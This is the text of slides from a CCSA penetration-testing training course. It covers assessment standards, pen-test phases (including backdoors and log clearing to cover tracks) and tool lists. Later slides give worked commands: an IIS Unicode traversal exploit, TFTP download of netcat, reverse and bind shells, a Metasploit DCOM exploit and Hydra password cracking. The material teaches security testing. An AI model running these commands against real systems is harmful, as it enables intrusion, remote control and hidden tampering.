The document provides information about the Certified Computer Security Analyst (CCSA) program and training. It discusses the trainer, Semi Yulianto's qualifications and experience working with various security training and consulting organizations. It also lists some of the key topics covered in the CCSA training program, including vulnerabilities assessment, penetration testing methodology, security tools, and investigating vulnerabilities.

1. Program:
Certified Computer Security Analyst (CCSA)
LSP Telematika
Created By Semi Yulianto
Shared By
Linuxer@kaskus.co.id

2. Semi Yulianto
MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA,
CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc 
Independent Trainer and Consultant
 EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)
Current Roles:
ITS2 (Riyadh, Saudi Arabia)
Senior Technical Trainer/Security Consultant
IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)

Security Consultant (Web Application Pen-Tester)

Security Consultant (ESET Anti-Virus & Smart Security)
semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com
Contacts:
+62 852 1325 6600 and +60 14 9377 462

3. 1. Vulnerabilities by Management Categories
2. Assessment Standards
3. Assessment Service Definition
4. Network Assessment Methodology
5. Pen-Test Methodology
6. Security Tools
7. Investigating Vulnerabilities

4. OS configuration - Vulnerabilities due to improperly configured operating system
software.

Software maintenance - Vulnerabilities due to failure to apply patches to known
vulnerabilities.

Password/access control - Failure to comply with password policy and improper
access control settings.

Malicious software - Existence of malicious software (Trojans, worms, etc.) or
evidence of use.

Dangerous services - Existence of vulnerable or easily exploited services or
processes.

Application configuration - Vulnerabilities due to improperly configured
applications.


7. The United States National Security Agency (NSA) has provided an
NSA (US)
INFOSEC Assessment Methodology (IAM) framework to help consultants

and security professionals
outside the NSA provide assessment services to clients in line with a
recognized standard.
http://www.iatrp.com
The Government Communications Headquarters (GCHQ) in the United
CESG CHECK (UK)
Kingdom has an information assurance arm known as the Communications


and Electronics
security consultants outside the NSA to provide assessment services, CESG
operates a program known as CHECK to evaluate and accredit security
Security Group (CESG). In the same way that the NSA IAM framework allows
testing teams within the U.K. to undertake government assessment work.
http://www.cesg.gov.uk/site/check/index.cfm

8.  Assessment - Level 1 involves discovering a cooperative high-
The IAM framework defines three levels of assessment:
level overview of the organization being assessed, including
access to policies, procedures, and information flow. No hands-
on network or system testing is undertaken at this level.
Evaluation - Level 2 is a hands-on cooperative process that
involves testing with network scanning, penetration tools, and
the use of specific technical expertise.

Red Team - Level 3 is non cooperative and external to the target
network, involving penetration testing to simulate the
appropriate adversary. IAM assessment is on intrusive, so within

this framework, a Level 3 assessment involves full qualification
of vulnerabilities.

9. 1. Use of DNS information retrieval tools for both single and
The CESG CHECK network security assessment as:
multiple records, including an understanding of DNS record
structure relating to target hosts.
2. Use of ICMP, TCP, and UDP network mapping and probing tools
3. Demonstration of TCP service banner grabbing.
4. Information retrieval using SNMP, including an understanding
of MIB structure relating to target system configuration and
network routes.
5. Understanding of common weaknesses in routers and switches
relating to Telnet, HTTP, SNMP, and TFTP access and
configuration.

10. 1. User enumeration via finger, rusers, rwho, and SMTP
CESG CHECK Unix-specific competencies:
techniques
2. Use of tools to enumerate Remote Procedure Call (RPC)
services and demonstrate an understanding of the security
implications associated with those services.
3. Demonstration of testing for Network File System (NFS)
weaknesses.
4. Testing for weaknesses within r-services (rsh, rexec, and
rlogin).
5. Detection of insecure X Windows servers.
6. Testing for weaknesses within web, FTP, and Samba services.

11. 1. Assessment of NetBIOS and CIFS services to enumerate
CESG CHECK Windows NT-specific competencies:
users, groups, shares, domains, domain controllers,
password policies, and associated weaknesses.
2. Username and password grinding via NetBIOS and CIFS
services.
3. Detecting and demonstrating presence of known security
weaknesses within.
4. Internet Information Server (IIS) web and FTP service
components, and Microsoft SQL Server.

12.  ISECOM’s Open Source Security Testing Methodology
Other Assessment Standards & Associations:
Manual (OSSTMM)
http://www.osstmm.org
 Council of Registered Ethical Security Testers (CREST)
http://www.crestapproved.com
 TIGER Scheme
http://www.tigerscheme.org
 EC-Council’s Certified Ethical Hacker (CEH)
http://www.eccouncil.org/CEH.htm
 Open Source Web Application Security Project (OWASP)
http://www.owasp.org

13. 1. Vulnerability Scanning
2. Network Security Assessment
3. Web Application Testing
4. Penetration Testing
5. Onsite Audit

14. Uses automated systems (such as Nessus, ISS Internet
Vulnerability Scanning
Scanner, QualysGuard, or eEye Retina) with minimal

hands-on qualification and assessment of
vulnerabilities. This is an inexpensive way to ensure that
no obvious vulnerabilities exist, but it doesn’t provide a
clear strategy to improve security.
An effective blend of automated and hands-on manual
Network Security Assessment
vulnerability testing and qualification. The report is

usually handwritten, accurate, and concise, giving
practical advice that can improve a company’s security.

15. Involves post-authentication assessment of web application
Web Application Testing
components, identifying command injection, poor

permissions, and other weaknesses within a given web
application. Testing at this level involves extensive manual
qualification and consultant involvement, and it cannot be
easily automated.
Involves multiple attack vectors (e.g., telephone war dialing,
Penetration Testing
social engineering, and wireless testing) to compromise the

target environment. It demonstrates and discusses the
methodologies adopted by determined Internet-based
attackers to compromise IP networks remotely, which in turn
will allow you to improve IP network security.

16. Provides the clearest picture of network security.
 Onsite Audition
Consultants have local system access and run tools
on each system capable of identifying anything
untoward, including rootkits, weak user passwords,
poor permissions, and other issues. 802.11 wireless
testing is often performed as part of onsite auditing.

19. 1. Network reconnaissance to identify IP networks
High-level components of Network Assessment:
and hosts of interest.
2. Bulk network scanning and probing to identify
potentially vulnerable hosts.
3. Investigation of vulnerabilities and further network
probing by hand.
4. Exploitation of vulnerabilities and circumvention of
security mechanisms.

20. 1. Information Gathering
2. Service Enumeration
3. Vulnerability Identification
4. Penetration
5. Maintaining Access
6. Housekeeping

21. The objective of information gathering is to find as
 Information Gathering
many information as possible about the target of
evaluation by using passive (Google, Whois, WWW)
or active (social engineering) information gathering.
Involves launching network and port scanning to
 Service Enumeration
find open, filtered ports and services running on a
specific port.

22. Involves finding new and currently available
 Vulnerability Identification
vulnerability on the operating systems, applications
and/or services (manual or automated).
Involves active penetration on a specific target of
 Penetration
evaluation by exploiting any new or known
vulnerability.

23. Involves uploading trojan or backdoor with the
Maintaining Access
objective to make it easier to go in and out from a

target of evaluation without having to do the
exploitation and ensure that the activities are not
being noticed.
Clearning up to cover tracks. Involves disabling
Housekeeping
audit settings and clearing or altering log files

(system, security and application).

25. 1. Nmap (http://www.insecure.org)
Scanning Tools:
2. Nessus (http://www.nessus.org)
3. ISS Internet Scanner (http://www.iss.net)
4. eEye Retina (http://www.eeye.com)
5. QualysGuard (http://www.qualys.com)
6. Matta Colossus (http://www.trustmatta.com)

26. 1. Metasploit Framework
Exploitation Frameworks:
(http://www.metasploit.com)
2. Core IMPACT (http://www.coresecurity.com)
3. Immunity CANVAS
(http://www.immunityinc.com/products-
canvas.shtml)

27. 1. Paros (http://www.parosproxy.org)
Proxy-based web application testing tools:
2. WebScarab
http://www.owasp.org/index.php/Category:OWAS
P_WebScarab_Project)
3. Burp suite (http://portswigger.net)

28. 1. Wapiti (http://wapiti.sourceforge.net)
Active web application crawling and fuzzing tools:
2. Nikto (http://www.cirt.net/code/nikto.shtml)

29. 1. Acunetix Web Vulnerability Scanner
Web Application Scanning Tools:
(http://www.acunetix.com)
2. Watchfire AppScan
(http://www.watchfire.com/products/appscan/)
3. SPI Dynamics WebInspect
(http://www.spidynamics.com/products/webinspe
ct/)
4. Cenzic Hailstorm
(http://www.cenzic.com/products_services/cenzic
_hailstorm.php)

30. 1. Securiteam (http://www.securiteam.com)
Useful Websites:
2. SecurityFocus (http://www.securityfocus.com)
3. milw0rm (http://www.milw0rm.com)
4. Offensive Security Exploit DB (http://www.exploit-db.com)
5. Packet Storm (http://www.packetstormsecurity.org)
6. FrSIRT (http://www.frsirt.com)
7. MITRE Corporation CVE (http://cve.mitre.org)
8. NIST National Vulnerability Database (http://nvd.nist.gov)
9. ISS X-Force (http://xforce.iss.net)
10. CERT vulnerability notes (http://www.kb.cert.org/vuls)
11. eEye Preview (http://research.eeye.com/html/services)
12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com)
13. VeriSign iDefense Security Intelligence Services
(http://labs.idefense.com/services)

31. 1. Information Gathering
2. Service Identification
3. Vulnerability Identification
4. Penetration (Exploitation)
5. Maintaining Access
6. Housekeeping (Covering Tracks)
7. Password Cracking
8. Client-Side Hacking
9. Web Application Hacking
10. Denial-of-Service (DoS) Attacks
11. Sniffing and ARP Spoofing
12. Wireless Hacking
13. Linux Hacking
14. Analyzing Attack Signatures with IDS and Sniffer
15. Evading IDS and Firewall

32. IIS Unicode Directory Traversal Exploit
 Syntax:
nc –v <target_ip> <http_port>
GET
http://<target_ip>/scripts/<unicode_string
s>/<windows_dir>/cmd.exe?/c+<command>
 Example:
nc –v 131.107.1.101 80
GET
http://131.107.1.101/scripts/..%255c../win
nt/system32/cmd.exe?/c+dir

33. TFTP (Trivial File Transfer Protocol)
Upload and Download
 Syntax:
tftp –i <localhost_ip> GET <file>
tftp –i <localhost_ip> PUT <file>
 Example:
tftp –i 131.107.1.252 GET nc.exe
tftp –i 131.107.1.101 PUT nc.exe
 Unicode Examples:
GET
http://131.107.1.101/scripts/..%255c../winnt/syste
m32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe

34. Netcat (Network Swiss Army Knife)
Server Mode (listening/reverse TCP)
 Syntax:
nc –v –l –p <port_to_listen_to>
nc –vlp <port_to_listen_to>
 Example:
nc –v –l –p 555
nc –vlp 555

35. Netcat (Network Swiss Army Knife)
Client Mode (connecting/bind TCP)
 Syntax:
nc –v <target_ip> <target_port>
 Example:
nc –v 131.107.1.101 555

36. Netcat (Network Swiss Army Knife)
Server Mode (listening/reverse TCP)
 Syntax:
nc –v –l –p <listening_port>
 Unicode Syntax:
GET
http://<target_ip>/scripts/<unicode_strings>/<wind
ows_dir>/cmd.exe?/c+<command>
 Example:
GET
http://131.107.1.101/scripts/..%255c../winnt/syste
m32/cmd.exe?/c+nc+-v+-l+-p+5555

37. Netcat (Network Swiss Army Knife)
Client Mode (connecting/bind TCP)
 Syntax:
nc –v <target_ip> <target_port>
 Unicode Syntax:
GET
http://<target_ip>/scripts/<unicode_strings>/<wind
ows_dir>/cmd.exe?/c+<command>
 Example:
GET
http://131.107.1.101/scripts/..%255c../winnt/syste
m32/cmd.exe?/c+nc+-v+131.107.1.252+555

38. Nmap (Ping Sweep/Network Scan)
 Syntax:
nmap –sP <network_id>
 Example:
nmap –sP 131.107.1.0/24
Nmap (Port Scan)
 Syntax:
nmap <target_ip>
 Example:
nmap 131.107.1.101

39. Nmap (Port Scan with Options)
 Syntax:
nmap <option> <target_ip>
 Examples:
nmap –sS –sV –O 131.107.1.101
nmap –sS –sV –p80,443 –O 131.107.1.101
nmap –sS –sV –p80,443 –O –T4 131.107.1.101
nmap –sS –sV –p80,443 –O –T4 –PN 131.107.1.101
nmap –sU –sV –O 131.107.1.101
nmap –A 131.107.1.101

40. Nmap (Enumeration)
 Syntax:
nmap <option> <script> <target_ip>
 Examples:
nmap –sS –script=smb-enum-users 131.107.1.101
nmap –sS –script=smb-enum-shares 131.107.1.101
nmap –sS –script=smb-enum-domains 131.107.1.101
nmap –sS –script=smb-enum-processes 131.107.1.101
nmap –sS –script=smb-enum-security 131.107.1.101

41. Metasploit Framework Exploit Module (MSFConsole)
cd /pentest/exploits/msf3
./msfconsole
 Syntax:
msf > help
msf > show exploits
msf > use <exploit_module>
msf > show payloads
msf > set PAYLOAD <payload_type>
msf > show options
msf > set RHOST <target_ip>
msf > set LHOST <localhost_ip>
msf > set LPORT <local_port>
msf > set RPORT <remote_port>
msf > show targets
msf > set TARGET <target_id>
msf > exploit

42. Metasploit Framework Exploit Module (MSFConsole)
cd /pentest/exploits/msf3
./msfconsole
 Example:
msf > help
msf > show exploits
msf > use windows/dcerpc/ms03_026_dcom
msf > show payloads
msf > set PAYLOAD windows/shell/reverse_tcp
msf > show options
msf > set RHOST 131.107.1.101
msf > set LHOST 131.107.1.252
msf > set LPORT 5555
msf > set RPORT 1234
msf > show targets
msf > set TARGET 0
msf > exploit

43. Metasploit Framework Auxiliary Module
cd /pentest/exploits/msf3
./msfconsole
 Syntax:
msf > help
msf > show auxiliary
msf > use <auxiliary_module>
msf > set RHOSTS <target_ip_or_network_id>
msf > run

44. Metasploit Framework Auxiliary Module
cd /pentest/exploits/msf3
./msfconsole
 Example 1:
msf > help
msf > show auxiliary
msf > use scanner/smb/smb_version
msf > set RHOSTS 131.107.1.101
msf > run
 Example 2:
msf > help
msf > show auxiliary
msf > use scanner/smb/smb_version
msf > set RHOSTS 131.107.1.0/24
msf > run

45. Metasploit Framework Exploit Module (MSFCLI)
cd /pentest/exploits/msf3
 Syntax:
./msfcli <exploit_module> <payload_type>
<options> E
 Example:
./msfcli windows/dcerpc/ms03_026_dcom
PAYLOAD=windows/shell/bind_tcp
RHOST=131.107.1.101 E

46. THC Hydra (Dictionary-based Password Cracking)
cd /tmp
 Syntax:
./hydra –L <users_file> -P <passwords_file>
<target_ip> <service_type>
 Examples:
./hydra –L login.txt –P pass.txt 131.107.1.101 ftp
./hydra –L login.txt –P pass.txt 131.107.1.101 smb
./hydra –L login.txt –P pass.txt 131.107.1.101 mssql
./hydra –L login.txt –P pass.txt 131.107.1.101 rpc

47. Nikto (Web Application Vulnerability Scanner)
cd /pentest/nikto
 Syntax:
./nikto.pl –host <target_ip>
 Example:
./nikto.pl –host 131.107.1.101